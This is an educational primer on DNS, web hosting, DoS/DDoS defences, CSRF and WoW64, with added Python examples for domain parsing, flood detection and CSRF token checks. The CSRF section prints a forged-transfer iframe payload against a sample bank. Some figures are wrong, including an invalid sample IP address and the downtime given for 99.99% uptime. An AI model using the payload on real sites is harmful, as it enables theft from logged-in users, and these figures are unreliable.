
Domain Name System

What is a Domain Name?
A domain name is an identification string that defines a realm of administrative autonomy, authority or control on the Internet. The Domain Name System, or DNS, is the most recognized system for assigning addresses to Internet web servers. Domain names are used to identify one or more IP addresses. Without a domain, you would have to tell your customers that your site is located at a temporary URL such as 127.441.733.14/~mysite instead of a domain name such as mysite.com, making your site appear unprofessional and impractical.

Root Name Server
A root name server is a name server for the root zone of the Domain Name System of the Internet. It directly answers requests for records in the root zone and answers other requests by returning a list of the authoritative name servers for the appropriate top-level domain (TLD).
Root Level Domain: The Domain Name System is a hierarchical naming system for computers, services, or any resource participating in the Internet. The top of that hierarchy is the root domain. The root domain does not have a formal name, and its label in the DNS hierarchy is an empty string.

Top Level Domain (TLD)
A top-level domain (TLD) is the last segment of a domain name: the letters immediately following the final dot in an Internet address. The top-level domains (TLDs) such as com, net and org are the highest level of domain names on the Internet. Top-level domains form the DNS root zone of the hierarchical Domain Name System. Every domain name ends with a top-level domain label. For example, in our website www.geekyshows.com, com is the top-level domain.

Restricted Top Level Domains
Restricted top-level domains (rTLDs), like .aero, .biz, .edu, .mil, .museum, .name, and .pro, require the registrant to represent a certain type of entity, or to belong to a certain community. For example, the .name TLD is reserved for individuals, and .edu is reserved for educational entities.

Country Code Top Level Domain
Country-code TLDs (ccTLDs) represent specific geographic locations. For example: .mx represents Mexico and .eu represents the European Union. Some ccTLDs have residency restrictions. For example, .eu requires registrants to live or be located in a country belonging to the European Union. Other ccTLDs, like the ccTLD .it representing Italy, allow anyone to register them, but require a trustee service if the registrant is not located in a specified country or region. Finally, there are ccTLDs that can be registered by anyone — .co representing Colombia, for example, has no residency requirements at all.

Second-level domains (SLD)
A second-level domain (SLD) is the portion of the domain name that is located immediately to the left of the dot and domain name extension. You define the SLD when you register a domain name.
Example 1: The SLD in mysite.com is mysite. 
Example 2: The SLD in mysite.co.uk is still mysite.

Country code second level domains (ccSLD)
A country code second-level domain (ccSLD) is a domain name class that many country code top-level domain (ccTLD) registries implement. The ccSLD portion of the domain name is located between the ccTLD and the SLD. Example: The ccSLD in coolexample.co.uk is .co.

What is a Subdomain Name?
Subdomains are a smaller part of a larger domain. For example, I have a website, www.geekyshows.com. If I create a subdomain at www.geekyshows.com, it will look like this: help.geekyshows.com. Here help is a subdomain.

Examples: www.geekyshows.com, help.geekyshows.com

DNS Hierarchy (example domain: help.geekyshows.com)
Root Level Domain      .
Top Level Domain       .com
Second Level Domain    geekyshows
Sub Domain             help
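An added example, not part of the original post: a small Python function that splits a name into the levels described above (root, TLD, ccSLD, SLD, subdomain). The ccSLD table is a constructed stand-in for the Public Suffix List, and the label rules follow the usual hostname syntax.

```python
# Added example (not part of the original post): split a domain name into the
# levels the post describes (root, TLD, ccSLD, SLD, subdomain).
import re

# Constructed, deliberately short table of ccTLDs that use country-code
# second-level domains (ccSLDs). A production parser would consult the
# Public Suffix List instead of a hand-written table like this one.
CC_SLDS = {
    "uk": {"co", "org", "ac", "gov", "me"},
    "au": {"com", "net", "org", "edu"},
    "in": {"co", "net", "org"},
}

# Hostname label: 1-63 letters, digits or hyphens, no leading/trailing hyphen.
LABEL_RE = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)$")


def split_domain(name):
    """Return the hierarchy levels of a domain name as a dict.

    The trailing dot that names the root ("geekyshows.com.") is optional and
    labels are compared case-insensitively, as DNS itself does.
    """
    cleaned = name.strip().lower().rstrip(".")
    if len(cleaned) > 253:
        raise ValueError(f"{name!r}: name longer than 253 characters")
    labels = cleaned.split(".")
    if len(labels) < 2:
        raise ValueError(f"{name!r}: need at least an SLD and a TLD")
    for label in labels:
        if not LABEL_RE.match(label):
            raise ValueError(f"{name!r}: invalid label {label!r}")

    tld = labels.pop()
    ccsld = None
    # A ccSLD sits between the ccTLD and the SLD (coolexample.co.uk -> co),
    # but only if a further label exists to serve as the SLD.
    if tld in CC_SLDS and len(labels) >= 2 and labels[-1] in CC_SLDS[tld]:
        ccsld = labels.pop()
    sld = labels.pop()
    subdomain = ".".join(labels) or None

    # The registrable part is what you buy from a registrar: the SLD plus
    # the public suffix (TLD alone, or ccSLD + ccTLD).
    suffix = f"{ccsld}.{tld}" if ccsld else tld
    return {
        "root": ".",
        "tld": tld,
        "ccsld": ccsld,
        "sld": sld,
        "subdomain": subdomain,
        "registrable": f"{sld}.{suffix}",
    }


def same_registrable_domain(a, b):
    """True when two hostnames belong to the same registered domain."""
    return split_domain(a)["registrable"] == split_domain(b)["registrable"]


if __name__ == "__main__":
    for example in ("help.geekyshows.com", "www.geekyshows.com", "coolexample.co.uk"):
        print(example, split_domain(example))
```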

How Domain Names are Assigned
The Internet Corporation for Assigned Names and Numbers (ICANN) is the ultimate authority for domain-name assignments. ICANN conveys authority to (accredits) Registrars throughout the world to register second-level domains within specific top-level domains; this ensures that all domain names are unique.

What is Domain Name System (DNS)?
DNS is a protocol within the set of standards for how computers exchange data on the Internet and on many private networks, known as the TCP/IP protocol suite. Its basic job is to turn a user-friendly domain name like "geekyshows.com" into an Internet Protocol (IP) address like 70.44.241.54 that computers use to identify each other on the network.

How Do Domain Names Work?
After registering a domain name, the domain name must point to a hosted website that has a numeric address, called an IP address, so that visitors can access the website using your domain name.
Your domain name and its associated IP address are stored in a common database along with every other domain and associated IP address that are accessible via the Internet.
When visitors enter your domain name into a Web browser, the browser uses your domain name to look up the associated IP address and, therefore, the website. People use domain names instead of IP addresses because it is easier to remember a name than a series of numbers.



Web Hosting


What is Website Hosting?
A web hosting service is a type of Internet hosting service that allows individuals and organizations to make their website accessible via the World Wide Web. When you create a website, it is composed of web pages containing text, images, videos and other content for people to see. However, people can see your website only when it is available on the Internet. To make your website available on the Internet, you have to store it on a computer called a web server. When you buy some space on a web server and store your web pages there, your website becomes hosted and can be seen by anyone.

What is a Web Server?
A web server is the computer on which the web pages of your website are stored. It delivers or "serves" the content of your website to users over the Internet. The computer that acts as a server has to have very high specifications. It is also connected to the Internet through a very powerful link. Web hosts, or web hosting companies, have their own servers on which they rent out space to you so that you can host your website and make it accessible to the general public.

Who is a Web Host?
Any person or company who owns a server and rents out web space for website hosting can be called a web host. Some web hosts do not own servers but rent a server from a large web hosting company and then resell the space under their own brand. The large web hosting companies even own their own datacenter (a collection of servers) where they can host millions of websites. Datacenters have many computer servers connected to the Internet with fast connections, backups and high security.

What are the Basic Features of a Web Hosting Plan? 
Disk Space - Disk space means the amount of storage space provided to you by your web hosting provider. You need disk space to store your web files composed of text, images, video, audio, etc.

Bandwidth - Bandwidth means the amount of data that a website can transfer over a period of time. It determines the speed of your website: more bandwidth means more speed. The less bandwidth your site has, the longer it takes to load.

Uptime - Uptime means the percentage of time that a hosting server stays up or running. 99.99% uptime would mean that your website will go down only for about 8 hours in a year while 98% uptime would mean that your website may remain down for about 7.3 days in a year.

Programming Services - Website hosting packages also let you create web pages with programming languages including HTML, PHP and ASP, as well as databases.

Customer Service - This is one of the basic and most essential features that one should look for while selecting a website hosting service. Good customer service will help you whenever you run into trouble.

What are the Types of Web Server Hosting? 
Shared Hosting - Shared hosting refers to when your website is hosted on a server along with many other customers' websites. Your users won't know this - your website is still configured as a separate website on the server and can still have its own domain name etc. It is simply sharing the server with other websites. Entry-level websites don't need high-performance features, and thus shared hosting can fulfill their needs without having to pay larger amounts of money.

Dedicated Server Hosting - This is a server that hosts only your web site or web sites. This can give you more control over your web site. It can also help in ensuring that other customers' web sites don't impact on your web site. Using dedicated servers is much more expensive than shared hosting, but if your site receives lots of traffic or you have other requirements (such as extra security requirements), a dedicated server could be for you.

Cloud Server Hosting - This is new on the market. Based on cloud computing technologies, cloud hosting is done through multiple servers interconnected with each other, unlike shared or dedicated server hosting, which are provided through only one server. Multiple servers acting as a single system have several advantages: load balancing, no single point of failure, non-reliance on a single server (leading to higher security), and the ability to increase or decrease server resources as per your needs. It is also a cost-effective web hosting solution, as hosting companies charge for cloud hosting services on the basis of usage. Because you can scale your resources up and down on a cloud server, you are able to use more resources only on the days when you expect higher traffic.

Virtual Dedicated Servers - Also known as virtual private servers, virtual dedicated servers are a low-cost alternative to dedicated servers. The web host can put many virtual servers on each machine, therefore reducing costs. When you log in to the virtual server, it appears as though you have your own dedicated server (even though other virtual servers are probably running on the same machine).

Reseller web hosting - It allows clients to become web hosts themselves. Resellers could function, for individual domains, under any combination of these listed types of hosting, depending on who they are affiliated with as a reseller. Resellers' accounts may vary tremendously in size: they may have anything from their own virtual dedicated server to a colocated server. Many resellers provide a nearly identical service to their provider's shared hosting plan and provide the technical support themselves.

Why Do You Need Web Hosting?
A lot of people tend to think that registering a domain name is good enough to get a website active. What they fail to understand is that a domain is as good as your name, a name by which others may recognize you. In order to get a website active and live on the internet, you need to host a website. If you are seeking to build a website without taking web hosting services, registering domain names will serve no purpose. Having a web hosting account is very important in order to get a website hosted. A web hosting company makes it possible for your website to be accessed by everyone on the web.


Denial of Service (DoS)


A Denial of Service (DoS) attack is a malicious attempt to make a server or a network resource unavailable to users, usually by temporarily interrupting or suspending the services of a host connected to the Internet.

DoS and DDoS Attack

It is important to differentiate between Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks.

In a DoS attack, one computer and one Internet connection are used to flood a server with packets, with the aim of overloading the targeted server's bandwidth and resources.
A DDoS attack uses many devices and multiple Internet connections, often distributed globally in what is referred to as a botnet. A DDoS attack is, therefore, much harder to deflect, simply because there is no single attacker to defend from: the targeted resource is flooded with requests from many hundreds or thousands of sources.

Types of DoS Attacks

The most common type of Denial of Service attack involves flooding the target resource with external communication requests. This overload prevents the resource from responding to legitimate traffic, or slows its response so significantly that it is rendered effectively unavailable.
Resources targeted in a DoS attack can be a specific computer, a port or service on the targeted system, an entire network, a component of a given network, or any system component. DoS attacks may also target human-system communications (e.g. disabling an alarm or printer), or human-response systems (e.g. disabling an important technician's phone or laptop).
DoS attacks can also target tangible system resources, such as computational resources (bandwidth, disk space, processor time); configuration information (routing information, etc.); and state information (for example, unsolicited TCP session resetting). Moreover, a DoS attack can be designed to: execute malware that maxes out the processor, preventing usage; trigger errors in machine microcode or in the sequencing of instructions, forcing the computer into an unstable state; exploit operating system vulnerabilities to sap system resources; or crash the operating system altogether.
The overriding similarity in these examples is that, as a result of the successful Denial of Service attack, the system in question does not respond as before, and service is either denied or severely limited.

Types of DDoS Attacks

DDoS attacks can be divided into three types:
  • Volume Based Attacks - This type of attack includes UDP floods, ICMP floods, and other spoofed-packet floods. The goal of this DDoS attack is to saturate the bandwidth of the attacked site. The magnitude of a volume-based attack is usually measured in bits per second.
  • Protocol Attacks - This type of DDoS attack consumes the resources of either the servers themselves, or of intermediate communication equipment, such as routers, load balancers and even some firewalls. Some examples of protocol attacks include SYN floods, fragmented packet attacks, Ping of Death, Smurf DDoS and more. Protocol attacks are usually measured in packets per second.
  • Application Layer Attacks - Perhaps the most dangerous type of DDoS attack, application layer attacks consist of seemingly legitimate and innocent requests. The intent of these attacks is to crash the web server. Some examples of application layer attacks include Slowloris, zero-day DDoS attacks, DDoS attacks that target Apache, Windows or OpenBSD vulnerabilities and more. The magnitude of this type of attack is measured in requests per second.

Symptoms and Manifestations

The United States Computer Emergency Readiness Team (US-CERT) defines symptoms of denial-of-service attacks to include:
  • Unusually slow network performance (opening files or accessing web sites)
  • Unavailability of a particular web site
  • Inability to access any web site
  • Dramatic increase in the number of spam emails received (this type of DoS attack is considered an e-mail bomb)
  • Disconnection of a wireless or wired internet connection
  • Being "hit offline": the target's connection to the Internet drops
Denial-of-service attacks can also lead to problems in the network 'branches' around the actual computer being attacked. For example, the bandwidth of a router between the Internet and a LAN may be consumed by an attack, compromising not only the intended computer, but also the entire network.
If the attack is conducted on a sufficiently large scale, entire geographical regions of Internet connectivity can be compromised without the attacker's knowledge or intent by incorrectly configured or flimsy network infrastructure equipment.

Methods of attack

A "Denial-of-Service" attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. There are two general forms of DoS attacks: those that crash services and those that flood services.
A DoS attack can be perpetrated in a number of ways. The five basic types of attack are:
  • Consumption of computational resources, such as bandwidth, disk space, or processor time.
  • Disruption of configuration information, such as routing information.
  • Disruption of state information, such as unsolicited resetting of TCP sessions.
  • Disruption of physical network components.
  • Obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.
A DoS attack may include execution of malware intended to:
  • Max out the processor's usage, preventing any work from occurring.
  • Trigger errors in the microcode of the machine.
  • Trigger errors in the sequencing of instructions, so as to force the computer into an unstable state or lock-up.
  • Exploit errors in the operating system, causing resource starvation and/or thrashing, i.e. using up all available facilities so that no real work can be accomplished, or crashing the system itself.
  • Crash the operating system itself.

Preventing DoS and DDoS Vulnerabilities

Defending against Denial of Service attacks typically involves the use of a combination of attack detection, traffic classification and response tools, aiming to block traffic that they identify as illegitimate and allow traffic that they identify as legitimate. A list of prevention and response tools is provided below:

Firewalls
Firewalls can be set up with simple rules such as allowing or denying protocols, ports or IP addresses. In the case of a simple attack coming from a small number of unusual IP addresses, for instance, one could put up a simple rule to drop all incoming traffic from those attackers.
More complex attacks will however be hard to block with simple rules: for example, if there is an ongoing attack on port 80 (web service), it is not possible to drop all incoming traffic on this port because doing so will prevent the server from serving legitimate traffic. Additionally, firewalls may be too deep in the network hierarchy. Routers may be affected before the traffic gets to the firewall. Nonetheless, firewalls can effectively prevent users from launching simple flooding type attacks from machines behind the firewall.

Some stateful firewalls, like OpenBSD's pf packet filter, can act as a proxy for connections: the handshake is validated (with the client) instead of simply forwarding the packet to the destination. It is available for other BSDs as well. In that context, it is called "synproxy".

Switches
Most switches have some rate-limiting and ACL capability. Some switches provide automatic and/or system-wide rate limiting, traffic shaping, delayed binding (TCP splicing), deep packet inspection and Bogon filtering (bogus IP filtering) to detect and remediate denial of service attacks through automatic rate filtering and WAN Link failover and balancing.
These schemes work as long as the DoS attacks are something that can be prevented by using them. For example, a SYN flood can be prevented using delayed binding or TCP splicing. Similarly, content-based DoS may be prevented using deep packet inspection. Attacks originating from dark addresses or going to dark addresses can be prevented using Bogon filtering. Automatic rate filtering works as long as you have set rate thresholds correctly and granularly. WAN-link failover works as long as both links have a DoS/DDoS prevention mechanism.

Routers
Similar to switches, routers have some rate-limiting and ACL capability. They, too, are manually set. Most routers can be easily overwhelmed under a DoS attack. Cisco IOS has features that help prevent flooding.

Application Front-end Hardware
Application front end hardware is intelligent hardware placed on the network before traffic reaches the servers. It can be used on networks in conjunction with routers and switches. Application front end hardware analyzes data packets as they enter the system, and then identifies them as priority, regular, or dangerous. There are more than 25 bandwidth management vendors.

IPS Based Prevention
Intrusion-prevention systems (IPS) are effective if the attacks have signatures associated with them. However, the trend among the attacks is to have legitimate content but bad intent. Intrusion-prevention systems which work on content recognition cannot block behavior-based DoS attacks.
An ASIC based IPS may detect and block denial of service attacks because they have the processing power and the granularity to analyze the attacks and act like a circuit breaker in an automated way.
A rate-based IPS (RBIPS) must analyze traffic granularly, continuously monitor the traffic pattern and determine whether there is a traffic anomaly. It must let legitimate traffic flow while blocking the DoS attack traffic.
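An added example, not code from the original post: a sliding-window rate detector and a SYN-only counter of the kind the switch and IPS sections describe, run over a constructed log. The log format, addresses and thresholds are all assumptions made for the illustration.

```python
# Added example (not part of the original post): a small rate-based detector
# of the kind the switch and IPS sections describe. It counts packets per
# source inside a sliding window, flags sources above a threshold, and
# separately lists sources that only ever send SYNs (a SYN-flood indicator).
# Log format, addresses and thresholds are constructed for illustration.
from collections import defaultdict, deque

# Constructed log: "<epoch-seconds> <src-ip> <dst-port> <tcp-flags>".
# 198.51.100.7 sends 15 SYNs to port 80 in 0.7 s; 203.0.113.5 completes a
# normal handshake and then sends one data segment.
SAMPLE_LOG = "\n".join(
    [f"{1000 + i * 0.05:.2f} 198.51.100.7 80 S" for i in range(15)]
    + [
        "1000.10 203.0.113.5 80 S",
        "1000.40 203.0.113.5 80 A",
        "1001.90 203.0.113.5 80 PA",
    ]
)


def parse_log(log_text):
    """Parse log lines into (timestamp, src, dst_port, flags), oldest first."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, port, flags = line.split()
        events.append((float(ts), src, int(port), flags))
    return sorted(events)


class SlidingWindowRateDetector:
    """Per-source packet-rate threshold over a sliding time window."""

    def __init__(self, window_seconds=1.0, max_packets=10):
        self.window = window_seconds
        self.limit = max_packets
        self._times = defaultdict(deque)

    def observe(self, ts, src):
        """Record one packet; return True if src now exceeds the limit."""
        q = self._times[src]
        q.append(ts)
        # Drop timestamps that have aged out of the window.
        while q and ts - q[0] > self.window:
            q.popleft()
        return len(q) > self.limit


def flagged_sources(log_text, window_seconds=1.0, max_packets=10):
    """Return {src: first timestamp at which src crossed the rate threshold}."""
    det = SlidingWindowRateDetector(window_seconds, max_packets)
    first_hit = {}
    for ts, src, _port, _flags in parse_log(log_text):
        if det.observe(ts, src) and src not in first_hit:
            first_hit[src] = ts
    return first_hit


def half_open_suspects(log_text, min_syns=5):
    """Sources that sent at least min_syns bare SYNs and never an ACK."""
    syns, acks = defaultdict(int), defaultdict(int)
    for _ts, src, _port, flags in parse_log(log_text):
        if "S" in flags and "A" not in flags:
            syns[src] += 1
        elif "A" in flags:
            acks[src] += 1
    return {src for src, n in syns.items() if n >= min_syns and acks[src] == 0}


if __name__ == "__main__":
    print("rate threshold crossed:", flagged_sources(SAMPLE_LOG))
    print("SYN-only sources:", half_open_suspects(SAMPLE_LOG))
```

Thresholds are the whole game here: the same flood passes unnoticed if `max_packets` is set above the burst size, which is what the post means by setting rate thresholds "correctly and granularly".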

DDS Based Defense
More focused on the problem than IPS, a DoS Defense System (DDS) is able to block connection-based DoS attacks and those with legitimate content but bad intent. A DDS can also address both protocol attacks (such as Teardrop and Ping of death) and rate-based attacks (such as ICMP floods and SYN floods).
Like IPS, a purpose-built system, such as the well-known Top Layer IPS products, can detect and block denial of service attacks at much nearer line speed than a software based system.

Blackholing and Sinkholing
With blackholing, all the traffic to the attacked DNS or IP address is sent to a "black hole" (null interface, non-existent server, ...). To be more efficient and avoid affecting network connectivity, it can be managed by the ISP.
Sinkholing routes the traffic to a valid IP address which analyzes it and rejects the bad packets. Sinkholing is not efficient for the most severe attacks.

Clean Pipes
All traffic is passed through a "cleaning center" or a "scrubbing center" via various methods such as proxies, tunnels or even direct circuits, which separates "bad" traffic (DDoS and also other common internet attacks) and only sends good traffic beyond to the server. The provider needs central connectivity to the Internet to manage this kind of service unless they happen to be located within the same facility as the "cleaning center" or "scrubbing center".


Cross-site Request Forgery


Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.

Key Concepts of Cross-Site Request Forgery
  • Malicious requests are sent from a site that a user visits to another site that the attacker believes the victim is validated against.
  • The malicious requests are routed to the target site via the victim’s browser, which is authenticated against the target site.
  • The vulnerability lies in the affected web application, not the victim’s browser or the site hosting the CSRF.
Executing a CSRF Attack

In a Cross-Site Request Forgery attack, the attacker exploits how the target web application manages authentication. For CSRF to be exploited, the victim must be authenticated against (logged in to) the target site. For instance, let's say examplebank.com has online banking that is vulnerable to CSRF. If I visit a page containing a CSRF attack on examplebank.com but am not currently logged in, nothing happens. If I am logged in, however, the requests in the attack will be executed as if they were actions that I had intended to do.
Let’s look at how the attack described above would work in a bit more detail. First let’s assume that I’m logged in to my account on examplebank.com which allows for standard online banking features, including transferring funds to another account.
Now let's say I happen to visit somemalicioussite.com. It just so happens that this site is trying to attack people who bank with examplebank.com and has set up a CSRF attack on its site. The attack will transfer $2500.00 to their account, which is account number 123456789. Somewhere on somemalicioussite.com the attackers have added this line of code:
<iframe src="http://examplebank.com/app/transferFunds?amount=2500&destinationAccount=123456789">
Upon loading that iframe, my browser will send that request to examplebank.com, where my browser is already logged in as me. The request will be processed and send $2500.00 to account 123456789.

Limitations

Several things have to happen for cross-site request forgery to succeed:
  • The attacker must target either a site that doesn't check the Referer header (which is common) or a victim with a browser or plugin bug that allows Referer spoofing (which is rare).
  • The attacker must find a form submission at the target site, or a URL that has side effects, that does something (e.g., transfers money, or changes the victim's e-mail address or password).
  • The attacker must determine the right values for all the form's or URL's inputs; if any of them are required to be secret authentication values or IDs that the attacker can't guess, the attack will fail.
  • The attacker must lure the victim to a Web page with malicious code while the victim is logged in to the target site.
Note that the attack is blind; i.e., the attacker can't see what the target website sends back to the victim in response to the forged requests, unless they exploit a cross-site scripting or other bug at the target website. Similarly, the attacker can only target links or submit forms that come up after the initial forged request if those subsequent links or forms are similarly predictable. (Multiple targets can be simulated by including multiple images on a page, or by using JavaScript to introduce a delay between clicks.)

Given these constraints, an attacker might have difficulty finding logged-in victims or attackable form submissions. On the other hand, attack attempts are easy to mount and invisible to victims, and application designers are less familiar with and prepared for CSRF attacks than they are for, say, password-guessing dictionary attacks.

Preventing Cross-Site Request Forgery (CSRF) Vulnerabilities

The most common method to prevent Cross-Site Request Forgery (CSRF) attacks is to append unpredictable challenge tokens to each request and associate them with the user's session. Such tokens should at a minimum be unique per user session, but can also be unique per request. By including a challenge token with each request, the developer can ensure that the request is valid and not coming from a source other than the user.

Individual Web users using unmodified versions of the most popular browsers can do relatively little to prevent cross-site request forgery. Logging out of sites and avoiding their "remember me" features can mitigate CSRF risk; not displaying external images or not clicking links in spam or untrusted e-mails may also help.

Browser extensions such as RequestPolicy (for Mozilla Firefox) can prevent CSRF by providing a default-deny policy for cross-site requests. However, this can significantly interfere with the normal operation of many websites. The CsFire extension (also for Firefox) can mitigate the impact of CSRF with less impact on normal browsing, by removing authentication information from cross-site requests. The NoScript extension mitigates CSRF threats by distinguishing trusted from untrusted sites, and removing payloads from POST requests sent by untrusted sites to trusted ones.

Web sites have various CSRF countermeasures available:
  • Requiring a secret, user-specific token in all form submissions and side-effect URLs prevents CSRF; the attacker's site cannot put the right token in its submissions
  • Requiring the client to provide authentication data in the same HTTP Request used to perform any operation with security implications (money transfer, etc.)
  • Limiting the lifetime of session cookies
  • Ensuring that there is no clientaccesspolicy.xml file granting unintended access to Silverlight controls.
  • Ensuring that there is no crossdomain.xml file granting unintended access to Flash movies
  • Verifying that the request's headers contain an X-Requested-With header (used by Ruby on Rails before v2.0 and Django before v1.2.5), or checking the HTTP Referer header and/or HTTP Origin header. These protections have been proven insecure under a combination of browser plugins and redirects which can allow an attacker to provide custom HTTP headers on a request to any website, hence allowing a forged request.
An easy and effective solution is to use a CSRF filter such as OWASP's CSRFGuard. The filter intercepts responses, detects whether each is an HTML document, inserts a token into the forms and optionally inserts script to add tokens to AJAX calls. The filter also intercepts requests to check that the token is present.

A variation on this approach is to double submit cookies for users who use JavaScript. If an authentication cookie is read using JavaScript before the post is made, JavaScript's stricter (and more correct) cross-domain rules will be applied. If the server requires requests to contain the value of the authentication cookie in the body of POST requests or the URL of dangerous GET requests, then the request must have come from a trusted domain, since other domains are unable to read cookies from the trusting domain.

Checking the HTTP Referer header to see if the request is coming from an authorized page is commonly used for embedded network devices because it does not increase memory requirements. However a request that omits the Referer header must be treated as unauthorized because an attacker can suppress the Referer header by issuing requests from FTP or HTTPS URLs. This strict Referer validation may cause issues with browsers or proxies that omit the Referer header for privacy reasons. Also, old versions of Flash (before 9.0.18) allow malicious Flash to generate GET or POST requests with arbitrary HTTP request headers using CRLF Injection. Similar CRLF injection vulnerabilities in a client can be used to spoof the referrer of an HTTP request.

To prevent forgery of login requests, sites can use these CSRF countermeasures in the login process, even before the user is logged in.

Sites with especially strict security needs, like banks, often log users off after (for example) 15 minutes of inactivity.

Using the HTTP specified usage for GET and POST, in which GET requests never have a permanent effect, is good practice but is not sufficient to prevent CSRF. Attackers can write JavaScript or ActionScript that invisibly submits a POST form to the target domain. However, filtering out unexpected GETs prevents some particular attacks, such as cross-site attacks using malicious image URLs or link addresses and cross-site information leakage through <script> elements (JavaScript hijacking); it also prevents (non-security-related) problems with aggressive web crawlers and link prefetching.
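An added example, not part of the original post: the examplebank.com transferFunds endpoint from above modelled in Python twice, once as the post describes it (an authenticated GET is enough) and once with the countermeasures listed here (POST only, a per-session token compared in constant time, and a strict Origin/Referer check that fails closed when the header is absent). The session store, request model and account numbers are constructed.

```python
# Added example (not part of the original post): the examplebank.com
# transferFunds endpoint modelled twice, once as the post describes it (any
# authenticated request, GET included, moves money) and once with the
# countermeasures the post lists. Session store, request model and account
# numbers are constructed for illustration.
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

SITE_ORIGIN = "https://examplebank.com"  # assumed origin of the bank
SESSIONS = {}  # cookie value -> Session (constructed in-memory store)


@dataclass
class Session:
    user: str
    # Unpredictable token bound to the session, as the post recommends.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    method: str
    params: dict  # query string or form body
    headers: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)


def login(user):
    """Create a session and return the cookie value the browser will store."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = Session(user)
    return sid


def _session_for(request):
    return SESSIONS.get(request.cookies.get("sid"))


def _apply_transfer(session, params, ledger):
    amount = int(params["amount"])
    dest = params["destinationAccount"]
    ledger[session.user] -= amount
    ledger[dest] = ledger.get(dest, 0) + amount
    return 200, f"transferred {amount} to {dest}"


def transfer_funds_vulnerable(request, ledger):
    """The endpoint as the post describes it: the cookie alone authorizes it."""
    session = _session_for(request)
    if session is None:
        return 401, "not logged in"
    return _apply_transfer(session, request.params, ledger)


def same_origin(request):
    """Origin (preferred) or Referer must name the bank; a missing header fails."""
    src = request.headers.get("Origin") or request.headers.get("Referer")
    if not src:
        return False
    u = urlsplit(src)
    return f"{u.scheme}://{u.netloc}" == SITE_ORIGIN


def transfer_funds_protected(request, ledger):
    """Same endpoint with the post's countermeasures applied."""
    session = _session_for(request)
    if session is None:
        return 401, "not logged in"
    if request.method != "POST":
        return 405, "state-changing requests must use POST"
    if not same_origin(request):
        return 403, "cross-site request rejected"
    token = request.params.get("csrf_token", "")
    # compare_digest avoids leaking the token through timing differences.
    if not hmac.compare_digest(token.encode(), session.csrf_token.encode()):
        return 403, "missing or invalid CSRF token"
    return _apply_transfer(session, request.params, ledger)


def forged_request(sid):
    """What the post's <iframe> produces: a GET carrying the victim's cookie."""
    return Request(
        "GET",
        {"amount": "2500", "destinationAccount": "123456789"},
        {"Referer": "http://somemalicioussite.com/"},
        {"sid": sid},
    )


def legitimate_request(sid):
    """A form submission rendered by the bank itself, token included."""
    return Request(
        "POST",
        {"amount": "2500", "destinationAccount": "123456789",
         "csrf_token": SESSIONS[sid].csrf_token},
        {"Origin": SITE_ORIGIN},
        {"sid": sid},
    )
```

The attacker's page cannot read the victim's session to learn the token, so even a JavaScript-submitted POST from somemalicioussite.com is refused by the protected version.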

Cross-site scripting (XSS) vulnerabilities (even in other applications running on the same domain) allow attackers to bypass CSRF preventions.


WoW64


WoW64 (Windows 32-bit on Windows 64-bit) is a subsystem of the Windows operating system capable of running 32-bit applications and is included on all 64-bit versions of Windows - including Windows XP Professional x64 Edition, IA-64 and x64 versions of Windows Server 2003, as well as 64-bit versions of Windows Vista, Windows Server 2008, Windows 7 and Windows 8. In Windows Server 2008 R2 Server Core, it is an optional component.
WoW64 is designed to take care of many of the differences between 32-bit Windows and 64-bit Windows, particularly involving structural changes to Windows itself.

Translation Libraries

The WoW64 subsystem comprises a lightweight compatibility layer that has similar interfaces on all 64-bit versions of Windows. It aims to create a 32-bit environment that provides the interfaces required to run unmodified 32-bit Windows applications on a 64-bit system. Technically, WoW64 is implemented using three dynamic-link libraries (DLLs):
  1. Wow64.dll, the core interface to the Windows NT kernel that translates between 32-bit and 64-bit calls, including pointer and call stack manipulations
  2. Wow64win.dll, which provides the 32-bit entry points for the windowing and graphics system calls (win32k.sys), so GUI applications are translated as well as console ones
  3. Wow64cpu.dll, which takes care of switching the processor from 32-bit to 64-bit mode

Registry and File System

The WoW64 subsystem also handles other key aspects of running 32-bit applications. It is involved in managing the interaction of 32-bit applications with Windows components such as the Registry, which has distinct keys for 64-bit and 32-bit applications. For example HKEY_LOCAL_MACHINE\Software\Wow6432Node is the 32-bit equivalent of HKEY_LOCAL_MACHINE\Software (although 32-bit applications are not aware of this redirection). Some Registry keys are mapped from 64-bit to their 32-bit equivalents, while others have their contents mirrored (registry reflection), depending on the key and the Windows version; from Windows 7 onwards reflection was dropped in favour of keys that are simply shared between both views.

The operating system uses the %SystemRoot%\system32 directory for its 64-bit library and executable files. This is done for backward compatibility reasons, as many legacy applications are hardcoded to use that path. When executing 32-bit applications, WoW64 transparently redirects 32-bit DLLs to %SystemRoot%\SysWoW64, which contains 32-bit libraries and executables. 32-bit applications are generally not aware that they are running on a 64-bit operating system. 32-bit applications can access %SystemRoot%\System32 through the pseudo directory %SystemRoot%\sysnative. The sysnative alias exists only inside the redirected view, so it works from a 32-bit process but not from a 64-bit one; this matters for anything that must reach the 64-bit cmd.exe, PowerShell or system tools from a 32-bit host process.

There are two Program Files directories, both visible to both 32-bit and 64-bit applications. The directory that stores the 32 bit files is called Program Files (x86) to differentiate between the two, while the 64 bit maintains the traditional Program Files name without any additional qualifier.

Incompatible Applications

32-bit applications that include only 32-bit kernel-mode device drivers, or that plug into the process space of components that are implemented purely as 64-bit processes (e.g. Windows Explorer) cannot be executed on a 64-bit platform. Service applications are supported.
